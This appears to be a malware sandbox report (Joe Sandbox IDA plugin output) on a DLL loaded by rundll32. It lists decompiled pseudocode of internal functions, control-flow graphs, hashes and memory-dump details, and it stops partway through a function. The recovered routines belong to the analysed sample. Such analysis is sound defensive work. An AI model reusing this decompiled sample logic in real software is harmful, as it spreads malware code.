                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a99d01f29d6d71aa247ede4238708413cc5a03a92a3deee771b5e3935a3b73a6
                                                                                                                                                                                                                                    • Instruction ID: b127a818dddf64a7ce021aa98e6c99e2f3e2483b469de294539edf6780431428
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a99d01f29d6d71aa247ede4238708413cc5a03a92a3deee771b5e3935a3b73a6
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47310E76900149EFCB05DF99D4C48AE7BB5FF48346B10846EF90AA7210E735AA45CFA1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C373FD, Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 472 4c373fd-4c37417 call 4c3a72d 475 4c37419 472->475 476 4c3741c-4c3743e call 4c31262 472->476 475->476 479 4c37444-4c3745e 476->479 480 4c374fd-4c37502 476->480 485 4c37464-4c37480 call 4c37cb8 479->485 486 4c374ed-4c374ef 479->486 481 4c37504 call 4c31f99 480->481 482 4c37509-4c3750f 480->482 481->482 487 4c374f0-4c374f5 485->487 490 4c37482-4c37494 call 4c389d6 485->490 486->487 487->480 492 4c37499-4c3749b 490->492 493 4c374bd-4c374eb call 4c32659 492->493 494 4c3749d-4c374a4 492->494 493->487 494->493 495 4c374a6-4c374b8 call 4c389d6 494->495 495->493
                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E04C373FD(void* __edx) {
				char _v8;
				char _v12;
				char _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				intOrPtr* _t52;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E04C3A72D(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x4c3d27c; // 0xa6a5a8
				_t4 = _t24 + 0x4c3ede0; // 0x56a9388
				_t5 = _t24 + 0x4c3ed88; // 0x4f0053
				_t26 = E04C31262( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					 *0x4c3d0f4(_v16, 0,  &_v12);
					_t52 = __imp__; // 0x76d25520
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x4c3d27c; // 0xa6a5a8
						_t11 = _t32 + 0x4c3edd4; // 0x56a937c
						_t48 = _t11;
						_t12 = _t32 + 0x4c3ed88; // 0x4f0053
						_t55 = E04C37CB8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x4c3d27c; // 0xa6a5a8
							_t13 = _t35 + 0x4c3ee1e; // 0x30314549
							_t37 = E04C389D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0x4c3d25c - 6;
								if( *0x4c3d25c <= 6) {
									_t42 =  *0x4c3d27c; // 0xa6a5a8
									_t15 = _t42 + 0x4c3ec2a; // 0x52384549
									E04C389D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x4c3d27c; // 0xa6a5a8
							_t17 = _t38 + 0x4c3ee18; // 0x56a93c0
							_t18 = _t38 + 0x4c3edf0; // 0x680043
							_t40 = E04C32659(_v8, 0x80000001, _t55, _t18, _t17);
							_t45 = _t40;
							 *_t52( *0x4c3d238, 0, _t55);
						}
					}
					 *_t52( *0x4c3d238, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04C31F99(_t54);
				}
				return _t45;
			}




















                                                                                                                                                                                                                                    0x04c373fd
                                                                                                                                                                                                                                    0x04c3740d
                                                                                                                                                                                                                                    0x04c37410
                                                                                                                                                                                                                                    0x04c37417
                                                                                                                                                                                                                                    0x04c37419
                                                                                                                                                                                                                                    0x04c37419
                                                                                                                                                                                                                                    0x04c3741c
                                                                                                                                                                                                                                    0x04c37421
                                                                                                                                                                                                                                    0x04c37428
                                                                                                                                                                                                                                    0x04c37435
                                                                                                                                                                                                                                    0x04c3743a
                                                                                                                                                                                                                                    0x04c3743e
                                                                                                                                                                                                                                    0x04c3744c
                                                                                                                                                                                                                                    0x04c37452
                                                                                                                                                                                                                                    0x04c3745a
                                                                                                                                                                                                                                    0x04c3745e
                                                                                                                                                                                                                                    0x04c374ef
                                                                                                                                                                                                                                    0x04c374ef
                                                                                                                                                                                                                                    0x04c37464
                                                                                                                                                                                                                                    0x04c37464
                                                                                                                                                                                                                                    0x04c37469
                                                                                                                                                                                                                                    0x04c37469
                                                                                                                                                                                                                                    0x04c37470
                                                                                                                                                                                                                                    0x04c3747c
                                                                                                                                                                                                                                    0x04c3747e
                                                                                                                                                                                                                                    0x04c37480
                                                                                                                                                                                                                                    0x04c37482
                                                                                                                                                                                                                                    0x04c37489
                                                                                                                                                                                                                                    0x04c37494
                                                                                                                                                                                                                                    0x04c3749b
                                                                                                                                                                                                                                    0x04c3749d
                                                                                                                                                                                                                                    0x04c374a4
                                                                                                                                                                                                                                    0x04c374a6
                                                                                                                                                                                                                                    0x04c374ad
                                                                                                                                                                                                                                    0x04c374b8
                                                                                                                                                                                                                                    0x04c374b8
                                                                                                                                                                                                                                    0x04c374a4
                                                                                                                                                                                                                                    0x04c374bd
                                                                                                                                                                                                                                    0x04c374c2
                                                                                                                                                                                                                                    0x04c374c9
                                                                                                                                                                                                                                    0x04c374d9
                                                                                                                                                                                                                                    0x04c374e7
                                                                                                                                                                                                                                    0x04c374e9
                                                                                                                                                                                                                                    0x04c374e9
                                                                                                                                                                                                                                    0x04c37480
                                                                                                                                                                                                                                    0x04c374fb
                                                                                                                                                                                                                                    0x04c374fb
                                                                                                                                                                                                                                    0x04c374fd
                                                                                                                                                                                                                                    0x04c37502
                                                                                                                                                                                                                                    0x04c37504
                                                                                                                                                                                                                                    0x04c37504
                                                                                                                                                                                                                                    0x04c3750f

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 6ed4306fa152e8d6b1574dd890a9a572cc295771f9aeff849bc01777de912ab5
                                                                                                                                                                                                                                    • Instruction ID: 0fd2fd2a9c3fe9e00878c4bb461d9352341763de12b3c7c996ad100e42f7b950
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ed4306fa152e8d6b1574dd890a9a572cc295771f9aeff849bc01777de912ab5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 533181B5901108BFEB11DBA0DC84EAA7BBDEF44706F158055B601A7161D775FE04EF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C37B5D, Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 500 4c37b5d-4c37b91 502 4c37b93-4c37b96 500->502 503 4c37c0b-4c37c11 500->503 504 4c37bb3-4c37bcd 502->504 505 4c37b98-4c37bb0 call 4c3908b 502->505 509 4c37bf8-4c37bfa 504->509 510 4c37bcf-4c37bd9 504->510 505->504 511 4c37c02-4c37c07 509->511 512 4c37bfc-4c37bfe 509->512 513 4c37be2-4c37be9 510->513 511->503 512->511 514 4c37bf2-4c37bf4 513->514 515 4c37beb-4c37bf0 513->515 514->509 515->509
                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                    			E04C37B5D(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t22;
				void* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				void* _t32;
				intOrPtr* _t33;
				intOrPtr _t36;
				intOrPtr* _t39;
				void* _t46;

				_t22 =  *0x4c3d27c; // 0xa6a5a8
				_t2 = _t22 + 0x4c3e0dc; // 0x56a8684
				_t3 = _t22 + 0x4c3e0cc; // 0x4590f811
				_t39 = 0;
				_v12 = 0;
				_t24 =  *0x4c3d15c(_t3, 0, 1, _t2,  &_v16); // executed
				_t46 = _t24;
				if(_t46 >= 0) {
					if(_a8 != 0) {
						_t36 =  *0x4c3d27c; // 0xa6a5a8
						_t8 = _t36 + 0x4c3e3b8; // 0x5f005f
						E04C3908B(_t8, _a8,  &_v12);
						_t39 = _v12;
					}
					_t26 = _v16;
					_t46 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _a4, 0, 0, 0, 0, 0, _t39,  &_v8);
					if(_t46 >= 0) {
						_t32 =  *0x4c3d158(_v8, 0xa, 0, 0, 3, 3, 0, 0); // executed
						_t46 = _t32;
						_t33 = _v8;
						if(_t46 < 0) {
							 *((intOrPtr*)( *_t33 + 8))(_t33);
						} else {
							 *_a12 = _t33;
						}
					}
					if(_t39 != 0) {
						 *((intOrPtr*)( *_t39 + 8))(_t39);
					}
					_t28 = _v16;
					 *((intOrPtr*)( *_t28 + 8))(_t28);
				}
				return _t46;
			}















                                                                                                                                                                                                                                    0x04c37b6a
                                                                                                                                                                                                                                    0x04c37b6f
                                                                                                                                                                                                                                    0x04c37b7b
                                                                                                                                                                                                                                    0x04c37b81
                                                                                                                                                                                                                                    0x04c37b84
                                                                                                                                                                                                                                    0x04c37b87
                                                                                                                                                                                                                                    0x04c37b8d
                                                                                                                                                                                                                                    0x04c37b91
                                                                                                                                                                                                                                    0x04c37b96
                                                                                                                                                                                                                                    0x04c37b9c
                                                                                                                                                                                                                                    0x04c37ba4
                                                                                                                                                                                                                                    0x04c37bab
                                                                                                                                                                                                                                    0x04c37bb0
                                                                                                                                                                                                                                    0x04c37bb0
                                                                                                                                                                                                                                    0x04c37bb3
                                                                                                                                                                                                                                    0x04c37bc9
                                                                                                                                                                                                                                    0x04c37bcd
                                                                                                                                                                                                                                    0x04c37bdc
                                                                                                                                                                                                                                    0x04c37be2
                                                                                                                                                                                                                                    0x04c37be6
                                                                                                                                                                                                                                    0x04c37be9
                                                                                                                                                                                                                                    0x04c37bf5
                                                                                                                                                                                                                                    0x04c37beb
                                                                                                                                                                                                                                    0x04c37bee
                                                                                                                                                                                                                                    0x04c37bee
                                                                                                                                                                                                                                    0x04c37be9
                                                                                                                                                                                                                                    0x04c37bfa
                                                                                                                                                                                                                                    0x04c37bff
                                                                                                                                                                                                                                    0x04c37bff
                                                                                                                                                                                                                                    0x04c37c02
                                                                                                                                                                                                                                    0x04c37c08
                                                                                                                                                                                                                                    0x04c37c08
                                                                                                                                                                                                                                    0x04c37c11

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f47665f5d3291e51a3c268ea40042e4f13f7accf4a53bcb33b487deed12d668a
                                                                                                                                                                                                                                    • Instruction ID: 039e3d144167b16f4d1adb15a8c8c88be501d5aa3f5cea15f9965be73b7b92f7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f47665f5d3291e51a3c268ea40042e4f13f7accf4a53bcb33b487deed12d668a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3217FB5601218BFCB10DFA4C888D9EBBBEEF89B56F008495F506DB240C631EE01DB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C383B7, Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 516 4c383b7-4c38406 518 4c38479-4c3847e 516->518 519 4c38408-4c38419 516->519 521 4c38470 519->521 522 4c3841b-4c3843b call 4c32049 519->522 521->518 526 4c38466 522->526 527 4c3843d-4c38447 522->527 528 4c3846f 526->528 529 4c3844c-4c3844e 527->529 528->521 530 4c38460-4c38461 call 4c39039 529->530 531 4c38450-4c3845f call 4c35544 529->531 530->526 531->530
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: bcba8e027b34aaddf07a613a0a167c7601d4ab87baf305f19d51e6e22195539e
                                                                                                                                                                                                                                    • Instruction ID: 4517b76a695fd50d4085254006fdb467cd267a65fa266406600c53f6ad95f3b0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcba8e027b34aaddf07a613a0a167c7601d4ab87baf305f19d51e6e22195539e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9521E6B6900228BBDF11AF95CC85ADEBFBEEF08751F104066FA04B6110D7759A44AFA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C343DF, Relevance: .1, Instructions: 79COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 535 4c343df-4c343ef call 4c32049 538 4c34495-4c34498 535->538 539 4c343f5-4c3440c 535->539 540 4c3449d-4c3449f 538->540 541 4c34413-4c34418 539->541 542 4c3448a-4c34493 call 4c39039 541->542 543 4c3441a-4c3443d 541->543 542->540 547 4c3443f-4c34458 543->547 548 4c3447e 543->548 552 4c34472-4c3447c 547->552 553 4c3445a-4c34470 547->553 549 4c34482-4c34488 548->549 549->542 551 4c3449a 549->551 551->540 552->548 553->549
                                                                                                                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                                                                                                                    			E04C343DF(void* __ebx, void* __ecx, void* __edi, signed int _a4) {
				signed int _v8;
				void* _t19;
				signed int _t21;
				intOrPtr _t22;
				intOrPtr* _t26;
				signed int _t27;
				intOrPtr* _t28;
				signed int _t29;
				intOrPtr* _t30;
				intOrPtr* _t32;
				intOrPtr* _t35;
				intOrPtr* _t40;
				intOrPtr _t43;
				intOrPtr _t45;
				intOrPtr* _t49;
				intOrPtr* _t51;

				_t51 = E04C32049(_t19, 0xc);
				if(_t51 == 0) {
					_t21 = 8;
				} else {
					_t22 =  *0x4c3d27c; // 0xa6a5a8
					_t1 = _t22 + 0x4c3e058; // 0x56a8600
					_t2 = _t22 + 0x4c3e028; // 0x2df01
					_t24 =  *0x4c3d15c(_t2, 0, 4, _t1, _t51); // executed
					_v8 = _t24;
					if(_t24 < 0) {
						L8:
						E04C39039(_t24, _t51);
						_t21 = _v8;
					} else {
						_t43 =  *0x4c3d27c; // 0xa6a5a8
						_t26 =  *_t51;
						_t4 = _t51 + 4; // 0x4
						_t35 = _t4;
						_t5 = _t43 + 0x4c3e048; // 0xd30c1661
						_t27 =  *((intOrPtr*)( *_t26))(_t26, _t5, _t35, __edi, __ebx);
						_v8 = _t27;
						_t28 =  *_t51;
						_t40 =  *_t28;
						if(_t27 < 0) {
							L6:
							_t24 =  *((intOrPtr*)(_t40 + 8))(_t28);
						} else {
							_t45 =  *0x4c3d27c; // 0xa6a5a8
							_t7 = _t51 + 8; // 0x8
							_t49 = _t7;
							_t8 = _t45 + 0x4c3e068; // 0x2df05
							_t29 =  *_t40(_t28, _t8, _t49);
							_v8 = _t29;
							if(_t29 < 0) {
								_t30 =  *_t35;
								 *((intOrPtr*)( *_t30 + 8))(_t30);
								_t28 =  *_t51;
								_t40 =  *_t28;
								goto L6;
							} else {
								_t32 =  *_t49;
								 *((intOrPtr*)( *_t32 + 0xa4))(_t32, 0);
								_t24 = _a4;
								_a4 = _a4 & 0x00000000;
								 *_a4 = _t51;
							}
						}
						if(_v8 >= 0) {
							_t21 = _a4;
						} else {
							goto L8;
						}
					}
				}
				return _t21;
			}



















                                                                                                                                                                                                                                    0x04c343eb
                                                                                                                                                                                                                                    0x04c343ef
                                                                                                                                                                                                                                    0x04c34497
                                                                                                                                                                                                                                    0x04c343f5
                                                                                                                                                                                                                                    0x04c343f5
                                                                                                                                                                                                                                    0x04c343fb
                                                                                                                                                                                                                                    0x04c34406
                                                                                                                                                                                                                                    0x04c3440d
                                                                                                                                                                                                                                    0x04c34415
                                                                                                                                                                                                                                    0x04c34418
                                                                                                                                                                                                                                    0x04c3448a
                                                                                                                                                                                                                                    0x04c3448b
                                                                                                                                                                                                                                    0x04c34490
                                                                                                                                                                                                                                    0x04c3441a
                                                                                                                                                                                                                                    0x04c3441a
                                                                                                                                                                                                                                    0x04c34420
                                                                                                                                                                                                                                    0x04c34426
                                                                                                                                                                                                                                    0x04c34426
                                                                                                                                                                                                                                    0x04c3442a
                                                                                                                                                                                                                                    0x04c34432
                                                                                                                                                                                                                                    0x04c34434
                                                                                                                                                                                                                                    0x04c34439
                                                                                                                                                                                                                                    0x04c3443b
                                                                                                                                                                                                                                    0x04c3443d
                                                                                                                                                                                                                                    0x04c3447e
                                                                                                                                                                                                                                    0x04c3447f
                                                                                                                                                                                                                                    0x04c3443f
                                                                                                                                                                                                                                    0x04c3443f
                                                                                                                                                                                                                                    0x04c34445
                                                                                                                                                                                                                                    0x04c34445
                                                                                                                                                                                                                                    0x04c34449
                                                                                                                                                                                                                                    0x04c34451
                                                                                                                                                                                                                                    0x04c34455
                                                                                                                                                                                                                                    0x04c34458
                                                                                                                                                                                                                                    0x04c34472
                                                                                                                                                                                                                                    0x04c34477
                                                                                                                                                                                                                                    0x04c3447a
                                                                                                                                                                                                                                    0x04c3447c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c3445a
                                                                                                                                                                                                                                    0x04c3445a
                                                                                                                                                                                                                                    0x04c34461
                                                                                                                                                                                                                                    0x04c34467
                                                                                                                                                                                                                                    0x04c3446a
                                                                                                                                                                                                                                    0x04c3446e
                                                                                                                                                                                                                                    0x04c3446e
                                                                                                                                                                                                                                    0x04c34458
                                                                                                                                                                                                                                    0x04c34488
                                                                                                                                                                                                                                    0x04c3449a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x04c34488
                                                                                                                                                                                                                                    0x04c34418
                                                                                                                                                                                                                                    0x04c3449f

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 49c56717f76b4dade9e95c8f54e43a95601c6e095e0c1a0625ceeae78de3688a
                                                                                                                                                                                                                                    • Instruction ID: bcab6922f367cf011ac5f1615e8955477d178c04546e460222ad7b97cfabaad5
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 49c56717f76b4dade9e95c8f54e43a95601c6e095e0c1a0625ceeae78de3688a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 652148B5600204EFE714CFA4C888F9A77B9EF8970AF108568F646CB250D775EE05DBA4
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C31A70, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 556 4c31a70-4c31a84 557 4c31a89-4c31a8e 556->557 558 4c31b25-4c31b2c 557->558 559 4c31a94-4c31a97 557->559 560 4c31ab1-4c31ab4 559->560 561 4c31a99-4c31aae 559->561 560->558 562 4c31ab6-4c31abb 560->562 561->560 564 4c31b18-4c31b23 562->564 565 4c31abd-4c31acf 562->565 564->558 568 4c31ad1-4c31ade 565->568 569 4c31b0f-4c31b14 565->569 568->569 571 4c31ae0-4c31aee call 4c32049 568->571 569->564 574 4c31af0-4c31afd call 4c35544 571->574 575 4c31aff 571->575 577 4c31b06 574->577 575->577 577->569
                                                                                                                                                                                                                                    C-Code - Quality: 35%
                                                                                                                                                                                                                                    			E04C31A70(intOrPtr* __eax, intOrPtr* _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				char _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				intOrPtr _t37;
				intOrPtr _t44;
				void* _t46;

				_push( &_v12);
				_push(__eax);
				_t37 = 0;
				_t44 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					__imp__(0xc8);
					_push( &_v12);
					_push(__eax);
					_v8 =  *((intOrPtr*)( *__eax + 0x24))();
				}
				if(_v8 >= _t37) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							__imp__(_v16);
							_t44 = _t31;
							if(_t44 != 0) {
								_t44 = _t44 + 1;
								_t46 = _t44 + _t44;
								_t37 = E04C32049(_t31, _t46);
								if(_t37 == 0) {
									_v8 = 0x8007000e;
								} else {
									_push(_t46);
									_push(_v16);
									_push(_t37);
									L04C35544();
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t37;
					 *_a8 = _t44 + _t44;
				}
				goto L13;
			}













                                                                                                                                                                                                                                    0x04c31a80
                                                                                                                                                                                                                                    0x04c31a81
                                                                                                                                                                                                                                    0x04c31a82
                                                                                                                                                                                                                                    0x04c31a84
                                                                                                                                                                                                                                    0x04c31a86
                                                                                                                                                                                                                                    0x04c31a8b
                                                                                                                                                                                                                                    0x04c31a8e
                                                                                                                                                                                                                                    0x04c31b25
                                                                                                                                                                                                                                    0x04c31b2c
                                                                                                                                                                                                                                    0x04c31b2c
                                                                                                                                                                                                                                    0x04c31a97
                                                                                                                                                                                                                                    0x04c31a9e
                                                                                                                                                                                                                                    0x04c31aa9
                                                                                                                                                                                                                                    0x04c31aaa
                                                                                                                                                                                                                                    0x04c31aae
                                                                                                                                                                                                                                    0x04c31aae
                                                                                                                                                                                                                                    0x04c31ab4
                                                                                                                                                                                                                                    0x04c31ab6
                                                                                                                                                                                                                                    0x04c31abb
                                                                                                                                                                                                                                    0x04c31ac4
                                                                                                                                                                                                                                    0x04c31acc
                                                                                                                                                                                                                                    0x04c31acf
                                                                                                                                                                                                                                    0x04c31ad4
                                                                                                                                                                                                                                    0x04c31ada
                                                                                                                                                                                                                                    0x04c31ade
                                                                                                                                                                                                                                    0x04c31ae0
                                                                                                                                                                                                                                    0x04c31ae1
                                                                                                                                                                                                                                    0x04c31aea
                                                                                                                                                                                                                                    0x04c31aee
                                                                                                                                                                                                                                    0x04c31aff
                                                                                                                                                                                                                                    0x04c31af0
                                                                                                                                                                                                                                    0x04c31af0
                                                                                                                                                                                                                                    0x04c31af1
                                                                                                                                                                                                                                    0x04c31af4
                                                                                                                                                                                                                                    0x04c31af5
                                                                                                                                                                                                                                    0x04c31afa
                                                                                                                                                                                                                                    0x04c31b09
                                                                                                                                                                                                                                    0x04c31b09
                                                                                                                                                                                                                                    0x04c31ade
                                                                                                                                                                                                                                    0x04c31b0f
                                                                                                                                                                                                                                    0x04c31b15
                                                                                                                                                                                                                                    0x04c31b15
                                                                                                                                                                                                                                    0x04c31b1e
                                                                                                                                                                                                                                    0x04c31b23
                                                                                                                                                                                                                                    0x04c31b23
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000021.00000002.529435799.0000000004C31000.00000020.00020000.sdmp, Offset: 04C30000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529382396.0000000004C30000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529486705.0000000004C3C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529510452.0000000004C3D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000021.00000002.529536251.0000000004C3F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_33_2_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 09791f304d7596d1070e2cad5a2244039275363d6dd2a96b50b4efcd88540ca5
                                                                                                                                                                                                                                    • Instruction ID: 35a204ed0099e852b3923d2ae74c019859523b6a621f755931003f073a559f18
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09791f304d7596d1070e2cad5a2244039275363d6dd2a96b50b4efcd88540ca5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9215675A00209FFDB10DFA4D884DDEBBB5FF49316B1441A9E905E7210EB30EA45DB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 04C38504, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                                                                                                    			E04C38504(void* __eax, void* __ecx, char _a4, intOrPtr* _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				char _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t23;
				void* _t28;
				void* _t35;
				char _t38;
				intOrPtr _t40;

				_push(__ecx);
				_push(__ecx);
				_t40 =  *0x4c3d340; // 0x56a8d39
				_push(0x800);
				_push(0);
